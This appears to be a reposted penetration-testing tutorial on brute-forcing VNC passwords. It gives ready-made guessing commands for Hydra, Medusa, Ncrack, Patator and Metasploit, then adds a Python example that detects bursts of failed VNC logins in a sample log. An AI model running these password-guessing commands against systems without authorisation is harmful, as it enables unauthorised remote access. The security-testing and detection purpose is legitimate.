Web penetration test - 5. Brute force cracking vulnerability - (6) VNC password cracking

2022-06-24 04:19:00 Seven days


Virtual Network Console (VNC) is a remote control tool developed by AT&T's European research laboratory. VNC is free, open-source software based on the UNIX and Linux operating systems. Its remote control is powerful, efficient and practical, and its performance is comparable to any remote control software on Windows and Mac. On Linux, VNC has four commands: vncserver, vncviewer, vncpasswd, and vncconnect. In most cases the user needs only two of them: vncserver and vncviewer.
Default port: 5900

I. Hydra

Hydra is a parallel login cracker that supports many protocols. It is very fast and flexible, and new modules are easy to add. It is included in the Kali toolset.

Hydra project page (full releases): https://github.com/vanhauser-thc/thc-hydra/releases

Hydra supports:
Cisco AAA, Cisco auth, Cisco enable, CVS, FTP, HTTP(S)-FORM-GET, HTTP(S)-FORM-POST, HTTP(S)-GET, HTTP(S)-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MySQL, NNTP, Oracle Listener, Oracle SID, PC-Anywhere, PC-NFS, POP3, PostgreSQL, RDP, Rexec, Rlogin, Rsh, SIP, SMB(NT), SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.

hydra -s 5900 -P /root/Desktop/pass.txt -t TASKS IP vnc

-P: path to the password list
-s: destination port number
-t: number of connections (TASKS) to run in parallel

II. Medusa

Medusa is a fast, parallel and modular login brute-forcer. Its goal is to support as many services that allow remote authentication as possible. It is included in the Kali toolset.

Documentation:
www.foofus.net/jmk/medusa/medusa.html
Source code:
https://github.com/jmk-foofus/medusa
https://github.com/jmk-foofus/medusa/archive/2.2.tar.gz

The main features are as follows:
1. Thread-based parallel testing: brute-force testing can be run against multiple hosts, users or passwords at the same time.
2. Flexible user input: target information (host/user/password) can be specified in several ways. For example, each item can be a single entry or a file containing multiple entries. In addition, a combined file format lets users refine their target list.
3. Modular design: each service module exists as an independent .mod file. This means the list of supported services can be extended without any modification to the core application.
4. Multiple protocols supported: many services are currently supported (for example SMB, HTTP, POP3, MS-SQL, SSHv2).

medusa -h 192.168.0.6 -u root -P /root/Desktop/pass.txt -M vnc

-U: path to the user name list
-P: path to the password list
-M: the module (service type) to test

III. Ncrack

Ncrack is a high-speed network authentication cracking tool. It aims to help companies protect their networks by proactively testing all their hosts and network devices for weak passwords. Ncrack is designed with a modular approach, a command-line syntax similar to Nmap, and a dynamic engine that can adjust its behavior according to network feedback. It allows fast and reliable large-scale auditing of multiple hosts. It is included in the Kali toolset.

Ncrack's features include a very flexible interface that gives the user complete control over network operations and allows very complex brute-force attacks, easy-to-use timing templates, and runtime interaction similar to Nmap's. Supported protocols include SSH, RDP, FTP, Telnet, HTTP(S), Wordpress, POP3(S), IMAP, CVS, SMB, VNC, SIP, Redis, PostgreSQL, MQTT, MySQL, MSSQL, MongoDB, Cassandra, WinRM, OWA, and DICOM.

Project page: https://nmap.org/ncrack/

ncrack -v --user root -P /root/Desktop/pass.txt IP:5900

-U: path to the user name list
-P: path to the password list
-v: increases verbosity (use twice or more for greater effect)

IV. Patator

Patator was written out of frustration with using Hydra, Medusa, Ncrack, Metasploit modules and Nmap NSE scripts for password guessing attacks. Its author chose a different approach, so as not to create yet another brute-force tool and to avoid repeating the same shortcomings. Patator is a multithreaded tool written in Python that strives to be more reliable and flexible than its predecessors.

Project page: https://github.com/lanjelot/patator

patator vnc_login host=IP password=FILE0 0=/root/Desktop/pass.txt -t 1 -x retry:fgrep!='Authentication failure' --max-retries 0 -x quit:code=0

V. Metasploit

use auxiliary/scanner/vnc/vnc_login
msf auxiliary(scanner/vnc/vnc_login) > set rhosts IP
msf auxiliary(scanner/vnc/vnc_login) > set pass_file /root/Desktop/pass.txt
msf auxiliary(scanner/vnc/vnc_login) > run
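
Seen from the server side, every tool above leaves the same trace: many failed VNC authentications from one source in a short time. The following Python example is added here and is not part of the original article; the log format, LINE_RE and detect_guessing are assumptions, and the sample lines are constructed.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample lines; NOT the log format of any particular VNC server.
# Adapt LINE_RE to what your server actually writes.
SAMPLE_LOG = """\
2022-06-24T04:19:00 vnc[812]: auth failed src=192.168.0.50
2022-06-24T04:19:01 vnc[812]: auth failed src=192.168.0.50
2022-06-24T04:19:01 vnc[812]: auth failed src=192.168.0.50
2022-06-24T04:19:02 vnc[812]: auth failed src=192.168.0.50
2022-06-24T04:19:03 vnc[812]: auth failed src=192.168.0.50
2022-06-24T04:19:04 vnc[812]: auth ok src=192.168.0.50
2022-06-24T04:20:00 vnc[812]: auth failed src=192.168.0.7
2022-06-24T04:45:00 vnc[812]: auth failed src=192.168.0.7
2022-06-24T04:45:30 vnc[812]: auth ok src=192.168.0.7
"""

LINE_RE = re.compile(r"^(\S+) vnc\[\d+\]: auth (failed|ok) src=(\S+)$")


def detect_guessing(log_text, max_failures=5, window=timedelta(seconds=60)):
    """Return {src: {"burst_at": ts, "success_after_burst": bool}} for every
    source with >= max_failures failed logins inside one sliding window."""
    recent = defaultdict(deque)  # src -> timestamps of its recent failures
    alerts = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not an authentication event
        ts = datetime.fromisoformat(m.group(1))
        result, src = m.group(2), m.group(3)
        if result == "ok":
            # A success after a burst suggests a guess may have worked:
            # this is the case to escalate first.
            if src in alerts:
                alerts[src]["success_after_burst"] = True
            continue
        q = recent[src]
        q.append(ts)
        while ts - q[0] > window:  # drop failures older than the window
            q.popleft()
        if len(q) >= max_failures and src not in alerts:
            alerts[src] = {"burst_at": ts, "success_after_burst": False}
    return alerts
```

On the sample, only 192.168.0.50 is flagged; the two failures from 192.168.0.7 are 25 minutes apart and stay below the threshold.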
Copyright notice
This article was written by [Seven days]. Please include a link to the original when reposting. Thank you.
https://yzsam.com/2022/175/202206232316234646.html